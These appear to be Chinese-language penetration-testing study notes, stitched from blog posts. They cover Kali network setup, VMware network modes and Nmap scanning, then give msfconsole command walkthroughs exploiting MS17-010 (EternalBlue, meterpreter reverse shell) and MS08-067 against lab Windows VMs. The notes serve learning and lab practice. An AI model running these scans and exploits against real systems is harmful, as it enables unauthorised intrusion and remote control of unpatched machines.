首先我们了解kali的网络设置
DHCP:动态主机配置协议 是一个局域网的协议 使用UDP 协议工作
静态IP:用于大部分的中小型网络 通过网络管理员手动分配IP
/etc 系统大部分服务启动过程都要访问该目录
我们直接去看看
/ect/network/interfaces
这里就可以配置两个
1.DHCP:
auto eth0
iface eth0 inet dhcp //配置eth0使用DHCP协议
2.静态ip
auto eth0
iface eth0 inet static //配置eth0使用默认的静态地址
address 192.168.0.90 //设置eth0的IP地址,根据需求配置
gateway 192.168.0.1 //配置当前主机的默认网关,根据需求配置
netmask 255.255.255.0 //配置eth0的子网掩码,根据需求配置
resolv.conf中 可以配置3 个 nameserver
一旦前面失效 就会尝试下一个
vi /etc/resolv.conf #进行DNS编辑
nameserver 114.114.114.114 //国内移动、电信和联通通用的DNS
nameserver 8.8.8.8 //是谷歌的IP地址
nameserver 223.5.5.5 //是阿里云的IP地址
nameserver 180.76.76.87 //是百度的IP地址
保存,退出
然后进行重启网络设置
sudo service networking restart
NAT 网络地址转移模式
Bridged 桥接模式
Host-Only 主机模式
NAT 就是虚拟系统会通过 宿主机 来访问外网
相当于主机存在两个网卡
一个是虚拟网卡 一个宿主机的网卡
当虚拟网卡想要访问外网的时候 就必须通过宿主机的IP地址
从外面看 就是宿主机的IP 是完全看不到虚拟环境的内部网络
这个时候
虚拟机和宿主机和虚拟交换机形成一个网段
宿主机和真实交换机形成一个网段
优点
不需要自己手动分配ip
只要宿主能访问即可
桥接模式就是 虚拟网卡和物理网卡通过 VMnet0虚拟交换机进行桥接
这个时候 VMnet0就相当于现实的交换机
他可以访问这个网络内的所有主机
但是需要手动设置 ip 子网掩码
这个模式中 可以互相ping
在Host-Only模式下,虚拟网络是一个全封闭的网络,它唯一能够访问的就是主机。
其实Host-Only网络和NAT网络很相似,不同的地方就是Host-Only网络没有NAT服务,所以虚拟网络不能连接到Internet。主机和虚拟机之间的通信是通过VMware Network Adepter VMnet1虚拟网卡来实现的。
kali的网络设置及三种网络模式_kali配置网络_木_木的博客-CSDN博客
ctf工具Nmap使用教程图文教程(超详细)_ctf 端口扫描_程序员小麦的博客-CSDN博客
扫描主机开发的端口 与服务(默认是1000个端口)
nmap [ip]
这里将我本机的端口扫描出来了 并且显示了 每个端口的服务是什么
其中我们可以对主机进行指定端口扫描 通过 -p指令
nmap 192.168.3.25 -p 80 单个
nmap 192.168.3.25 -p 1-80 范围
nmap 192.168.3.25 -p 80,3389,22,21 枚举
nmap 192.168.3.25 -p 1-65535 范围
nmap 192.168.3.25 -p- 相当于 1-65536
-sT 使用三次完整的握手来判断存活 否则失败
-sS 通过两次握手来 如果对方传回确认帧 那么就存活
可以扫描哪里主机存活
-sP 不扫描端口 只扫描主机
其实实质上就是 ping 只要ping通 就说明存活
nmap 192.168.3.0/24 -sP
上面显示了 256个IP中存在3个活着的 主机
在扫描端口的时候 会默认显示端口存在的服务
如果要查看服务的具体版本 就可以使用 -sV
nmap 192.168.3.25 -p 80 -sV
发现是 apache 的服务器
-O 可以识别端口的主机的系统
nmap 192.168.3.25 -p 80 -O
发现这里就显示 run在 win10上
我们可以通过 nmap 来探测防火墙的存在
nmap 192.168.3.25 -sF
T4可以指定时序 0-5 级别越高 速度越快 越容易被防火墙ban
nmap -F -T4 -P0
-F 100个端口 -P0 无ping扫描
nmap -sC -sV -Pn 192.168.3.25
-sC 通过 nmap 脚本探测
-Pn 进制ping 后扫描
-sV 版本探测
nmap -A -v -T4 +IP
MATESPLOIT(MSF)是个免费开源的 攻击框架
附带了很多已知 知名的漏洞
在刚刚MSF出现的时候 只要会使用 MSF 就可以对未打补丁或刚刚打补丁的进行攻击
在kali中自带了 MSF
所以我们只需要启动即可
msfconsole
这里对MSF的几个模块进行解释
1、Auxiliary(辅助模块)
收集信息 提供大量辅助的一个模块
2、Exploits(攻击模块)
通过调动漏洞 进行攻击
3、Payload(攻击载荷模块)
攻击成功后促使靶机运行的一段植入代码
4、Post (后渗透攻击模块)
收集更多信息或进一步访问被利用的目标系统
5、Encoders(编码模块)
就是通过 编码绕过
首先来了解一下基础的用法
【工具使用】——Metasploit(MSF)使用详解(超详细)_剑客 getshell的博客-CSDN博客
msfconsole
进入 msf框架
search ms17_010
通过 search 命令查找漏洞
use exploit/windows/smb/ms17_010_eternalblue
通过 use 进入模块
info
查看设置
set payload windows/x64/meterpreter/reverse_tcp
设置 攻击模块为 这个漏洞
options
查看参数
set RHOST 192.168.100.158
设置攻击对象
run
进行攻击
大致就差不多是这样
首先准备win7 的 IP 地址 我这里是 192.168.222.133
我们先通过 nmap 查看 一个网段存活的主机
nmap -sS 192.168.222.0/24
发现存在 5 个 其中能发现我们要攻击的主机ip
133
那么我们就看看 他是什么系统的
nmap -O 192.168.222.133
然后使用 nmap的脚本查看存在什么漏洞
nmap --script=vuln 192.168.222.133
发现主角了 ms17-010 那么我们就请出MSF
msfconsole
search ms17-010
这里exp的都是漏洞利用模块的 auxiliary是辅助探测模块 所以我们先通过 辅助探测 看看存不存在漏洞
这里直接 use 3
然后看看info
发现了 这里rhosts没有设置 而且是必须设置的选项
那我们就设置 为 攻击目标的ip范围
注:RHOSTS 参数是要探测主机的ip或ip范围,我们探测一个ip范围内的主机是否存在漏洞
set rhosts 192.168.222.100-192.168.222.190
exploit
扫到了
那我们直接通过
Exploit漏洞利用模块 对目标进行攻击
set rhosts 192.168.222.133
然后run 即可
这样就成功拿到shell了
接下来复现另一个漏洞
ms08-067漏洞复现_ms08-067复现_老司机开代码的博客-CSDN博客
MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windows2000、XP和Server2003,无需认证便可以利用这个漏洞;对于WindowsVista和Server2008,可能需要进行认证。
首先需要一个 xp的系统 一样这里的ip为137
那我们直接开始
nmap -sS 192.168.222.0/24
我们看看什么系统
nmap -O 192.168.222.137
发现也无法确定 那我们直接就 通过脚本扫
nmap --script=vuln 192.168.222.137
扫到了 并且也存在永恒之蓝
那我们直接启动 msf
msfconsole
search MS08-067
use 0
options
set RHOSTS 192.168.222.137
show targets
set target 34
run
成功调用了cmd